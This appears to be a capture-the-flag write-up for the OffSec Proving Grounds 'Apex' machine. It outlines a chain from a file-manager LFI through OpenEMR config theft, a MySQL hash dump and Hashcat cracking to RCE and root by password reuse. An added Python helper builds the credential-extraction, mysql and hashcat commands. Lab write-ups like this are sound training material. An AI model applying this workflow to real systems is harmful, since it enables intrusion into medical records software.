Apex Proving Grounds Write-Up
SUMMARY
This write-up covers the Apex machine from Offsec’s Proving Grounds, a Linux machine chaining a file manager LFI with an OpenEMR RCE and credential reuse for root.
Port 80 hosted a hospital web application. Directory fuzzing revealed a Responsive FileManager v9.13.4 panel vulnerable to Local File Inclusion, along with an OpenEMR 5.0.1 login page. OpenEMR’s GitHub repository was consulted to locate the path of its SQL configuration file; the LFI was then used to extract that file and deposit it in a readable location. The copy could not be opened through the file manager itself, but it was readable through an exposed SMB share. The file contained hard-coded database credentials, which were used to query MySQL and extract the admin password hash. Hashcat cracked the hash, granting access to the OpenEMR panel.
A searchsploit exploit for OpenEMR provided authenticated RCE and a shell as www-data. The cracked password was reused for the root account, completing the machine.
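The two offline steps in that chain, pulling the database credentials out of the recovered SQL configuration file and picking the right Hashcat mode for the hash that comes back from MySQL, are shown below as an added example. This is not code from the write-up, and the sample config is a constructed file in the shape of OpenEMR's `sites/default/sqlconf.php`, not the machine's real values; the `users_secure` table name in the usage line is an assumption about where OpenEMR keeps its password hashes.

```python
import re
import shlex

# Constructed sample in the shape of OpenEMR's sqlconf.php. The values are
# placeholders chosen for this example, not credentials from the machine.
SAMPLE_SQLCONF = r"""<?php
//  OpenEMR
//  MySQL Config

$host   = 'localhost';
$port   = '3306';
$login  = 'openemr';
$pass   = 'S3cretDbPass!';
$dbase  = 'openemr';
$db_encoding = 'utf8';
"""

# Matches simple PHP scalar assignments: $name = 'value';  or  $name = "value";
# Values containing an escaped quote of the same kind are not handled; the
# OpenEMR installer writes plain single-quoted strings, which is enough here.
ASSIGN_RE = re.compile(r"""^\s*\$(\w+)\s*=\s*(['"])(.*?)\2\s*;""", re.M)


def parse_sqlconf(text):
    """Return {variable: value} for every quoted scalar assignment in a PHP config."""
    return {m.group(1): m.group(3) for m in ASSIGN_RE.finditer(text)}


def db_credentials(text):
    """Extract the MySQL connection parameters OpenEMR's sqlconf.php defines."""
    conf = parse_sqlconf(text)
    missing = [k for k in ("host", "login", "pass", "dbase") if k not in conf]
    if missing:
        raise ValueError(f"sqlconf.php is missing: {missing}")
    return {
        "host": conf["host"],
        "port": int(conf.get("port") or 3306),
        "user": conf["login"],
        "password": conf["pass"],
        "database": conf["dbase"],
    }


def mysql_cmd(creds, query):
    """Build the argv for a non-interactive mysql client query with the recovered creds."""
    return [
        "mysql", "-h", creds["host"], "-P", str(creds["port"]),
        "-u", creds["user"], f"--password={creds['password']}",
        "-e", query, creds["database"],
    ]


# Hash formats commonly found in web-app user tables, with their Hashcat mode numbers.
HASH_MODES = [
    (re.compile(r"^\$2[aby]\$\d{2}\$"), 3200, "bcrypt"),
    (re.compile(r"^\$6\$"), 1800, "sha512crypt"),
    (re.compile(r"^\$1\$"), 500, "md5crypt"),
    (re.compile(r"^[0-9a-f]{32}$", re.I), 0, "MD5"),
    (re.compile(r"^[0-9a-f]{40}$", re.I), 100, "SHA1"),
]


def hashcat_mode(h):
    """Return (mode, name) for a recognised hash string, or None if unrecognised."""
    for rx, mode, name in HASH_MODES:
        if rx.match(h):
            return mode, name
    return None


def hashcat_cmd(h, wordlist="rockyou.txt"):
    """Build the argv for cracking one hash; raises if the format is unknown."""
    found = hashcat_mode(h)
    if found is None:
        raise ValueError("unrecognised hash format; identify it before cracking")
    return ["hashcat", "-m", str(found[0]), "-a", "0", h, wordlist]


if __name__ == "__main__":
    creds = db_credentials(SAMPLE_SQLCONF)
    # Assumed table/columns: OpenEMR keeps login hashes in users_secure.
    query = "SELECT username, password FROM users_secure;"
    print(shlex.join(mysql_cmd(creds, query)))
    # A bcrypt-shaped placeholder, not a real hash from the target.
    sample_hash = "$2a$10$" + "a" * 53
    print(shlex.join(hashcat_cmd(sample_hash)))
```

Passing the password via `--password=` keeps the client from prompting, which matters when the query is run through a reverse shell rather than a terminal; the trade-off is that the password lands in the process list, so on a shared host prefer a `~/.my.cnf` with the credentials instead.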
PATH TO FOLLOW
- Reconnaissance & Responsive FileManager + OpenEMR Discovery
- LFI Exploitation → SQL Config File Extraction via SMB
- MySQL Admin Hash Extraction & Hashcat Crack
- OpenEMR Admin Login & RCE Exploit → Shell as www-data
- Cleartext Password Reuse → Shell as Root
Due to OffSec’s policy on content sharing, these write-ups will provide hints only rather than full solutions. I know, boring stuff.